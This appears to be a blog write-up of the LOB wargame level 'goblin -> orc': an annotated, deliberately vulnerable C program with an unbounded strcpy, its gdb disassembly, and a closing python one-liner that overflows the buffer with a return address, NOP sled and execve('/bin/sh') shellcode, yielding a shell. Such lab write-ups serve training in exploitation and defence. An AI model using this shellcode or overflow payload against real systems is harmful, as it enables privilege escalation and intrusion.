• [lob]goblin->orc
    공부/LOB 2014. 7. 30. 20:01

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    extern char **environ;

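    /*
     * Challenge binary for the LOB "goblin -> orc" level (orc.c).
     *
     * This program is deliberately vulnerable and must stay that way: argv[1]
     * is copied into a 40-byte stack buffer with strcpy(), so an argument of
     * 48+ bytes overwrites the saved ebp and the return address. From the
     * disassembly, buffer lives at ebp-0x28, so the return address is at
     * argv[1][44..47]; the check below pins argv[1][47] to 0xbf, i.e. the
     * overwritten return address has to point into the 0xbfxxxxxx stack region.
     *
     * The "egghunter" loop wipes every environment string, so a payload cannot
     * be staged in the environment (the usual trick in the earlier levels);
     * the shellcode has to live in argv[1] itself.
     *
     * The braces and the two exit(0) calls were lost when this listing was
     * pasted; they are restored here to match the disassembly (push $0x0;
     * call exit at main+25 and main+164).
     */
    int main(int argc, char *argv[])
    {
        char buffer[40];    /* overflow target: the strcpy() below is unbounded */
        int i;

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        // egghunter: zero every environment string in place so nothing useful
        // survives in the environment block.
        for(i=0; environ[i]; i++)
            memset(environ[i], 0, strlen(environ[i]));

        // Byte 47 of argv[1] is the high byte of the overwritten return address;
        // reject anything that does not return into the stack. Note this read
        // happens before any length check, so it is itself out of bounds when
        // argv[1] is shorter than 48 bytes.
        if(argv[1][47] != '\xbf')
        {
            printf("stack is still your friend.\n");
            exit(0);
        }

        strcpy(buffer, argv[1]);    /* the actual overflow: no bound on the copy */
        printf("%s\n", buffer);
        return 0;
    }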
    [goblin@localhost goblin]$ ls
    core  orc  orc.c  ore  sg
    [goblin@localhost goblin]$ gdb ore
    GNU gdb 19991004
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) disas main
    Dump of assembler code for function main:
    0x8048500 <main>:    push   %ebp
    0x8048501 <main+1>:    mov    %esp,%ebp
    0x8048503 <main+3>:    sub    $0x2c,%esp
    0x8048506 <main+6>:    cmpl   $0x1,0x8(%ebp)
    0x804850a <main+10>:    jg     0x8048523 <main+35>
    0x804850c <main+12>:    push   $0x8048630
    0x8048511 <main+17>:    call   0x8048410 <printf>
    0x8048516 <main+22>:    add    $0x4,%esp
    0x8048519 <main+25>:    push   $0x0
    0x804851b <main+27>:    call   0x8048420 <exit>
    0x8048520 <main+32>:    add    $0x4,%esp
    0x8048523 <main+35>:    nop   
    0x8048524 <main+36>:    movl   $0x0,0xffffffd4(%ebp)
    0x804852b <main+43>:    nop   
    0x804852c <main+44>:    lea    0x0(%esi,1),%esi
    0x8048530 <main+48>:    mov    0xffffffd4(%ebp),%eax
    0x8048533 <main+51>:    lea    0x0(,%eax,4),%edx
    0x804853a <main+58>:    mov    0x8049750,%eax
    0x804853f <main+63>:    cmpl   $0x0,(%eax,%edx,1)
    0x8048543 <main+67>:    jne    0x8048547 <main+71>
    0x8048545 <main+69>:    jmp    0x8048587 <main+135>
    0x8048547 <main+71>:    mov    0xffffffd4(%ebp),%eax
    0x804854a <main+74>:    lea    0x0(,%eax,4),%edx
    0x8048551 <main+81>:    mov    0x8049750,%eax
    0x8048556 <main+86>:    mov    (%eax,%edx,1),%edx
    0x8048559 <main+89>:    push   %edx
    0x804855a <main+90>:    call   0x80483f0 <strlen>
    0x804855f <main+95>:    add    $0x4,%esp
    0x8048562 <main+98>:    mov    %eax,%eax
    0x8048564 <main+100>:    push   %eax
    0x8048565 <main+101>:    push   $0x0
    0x8048567 <main+103>:    mov    0xffffffd4(%ebp),%eax
    0x804856a <main+106>:    lea    0x0(,%eax,4),%edx
    0x8048571 <main+113>:    mov    0x8049750,%eax
    ---Type <return> to continue, or q <return> to quit---
    0x8048576 <main+118>:    mov    (%eax,%edx,1),%edx
    0x8048579 <main+121>:    push   %edx
    0x804857a <main+122>:    call   0x8048430 <memset>
    0x804857f <main+127>:    add    $0xc,%esp
    0x8048582 <main+130>:    incl   0xffffffd4(%ebp)
    0x8048585 <main+133>:    jmp    0x8048530 <main+48>
    0x8048587 <main+135>:    mov    0xc(%ebp),%eax
    0x804858a <main+138>:    add    $0x4,%eax
    0x804858d <main+141>:    mov    (%eax),%edx
    0x804858f <main+143>:    add    $0x2f,%edx
    0x8048592 <main+146>:    cmpb   $0xbf,(%edx)
    0x8048595 <main+149>:    je     0x80485b0 <main+176>
    0x8048597 <main+151>:    push   $0x804863c
    0x804859c <main+156>:    call   0x8048410 <printf>
    0x80485a1 <main+161>:    add    $0x4,%esp
    0x80485a4 <main+164>:    push   $0x0
    0x80485a6 <main+166>:    call   0x8048420 <exit>
    0x80485ab <main+171>:    add    $0x4,%esp
    0x80485ae <main+174>:    mov    %esi,%esi
    0x80485b0 <main+176>:    mov    0xc(%ebp),%eax
    0x80485b3 <main+179>:    add    $0x4,%eax
    0x80485b6 <main+182>:    mov    (%eax),%edx
    0x80485b8 <main+184>:    push   %edx
    0x80485b9 <main+185>:    lea    0xffffffd8(%ebp),%eax
    0x80485bc <main+188>:    push   %eax
    0x80485bd <main+189>:    call   0x8048440 <strcpy>
    0x80485c2 <main+194>:    add    $0x8,%esp
    0x80485c5 <main+197>:    lea    0xffffffd8(%ebp),%eax
    0x80485c8 <main+200>:    push   %eax
    0x80485c9 <main+201>:    push   $0x8048659
    0x80485ce <main+206>:    call   0x8048410 <printf>
    0x80485d3 <main+211>:    add    $0x8,%esp
    0x80485d6 <main+214>:    leave 
    0x80485d7 <main+215>:    ret   
    0x80485d8 <main+216>:    nop   
    ---Type <return> to continue, or q <return> to quit---
    0x80485d9 <main+217>:    nop   
    0x80485da <main+218>:    nop   
    0x80485db <main+219>:    nop   
    0x80485dc <main+220>:    nop   
    0x80485dd <main+221>:    nop   
    0x80485de <main+222>:    nop   
    0x80485df <main+223>:    nop   
    End of assembler dump.

    [goblin@localhost goblin]$ ./orc `python -c'print "a"*44+"\xb4\xfa\xff\xbf"+"\x90"*20+"x68\xf9\xff\xbf"+"\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
    bash$ ls
    ls: .: Permission denied
    bash$ my-pass
    euid = 504
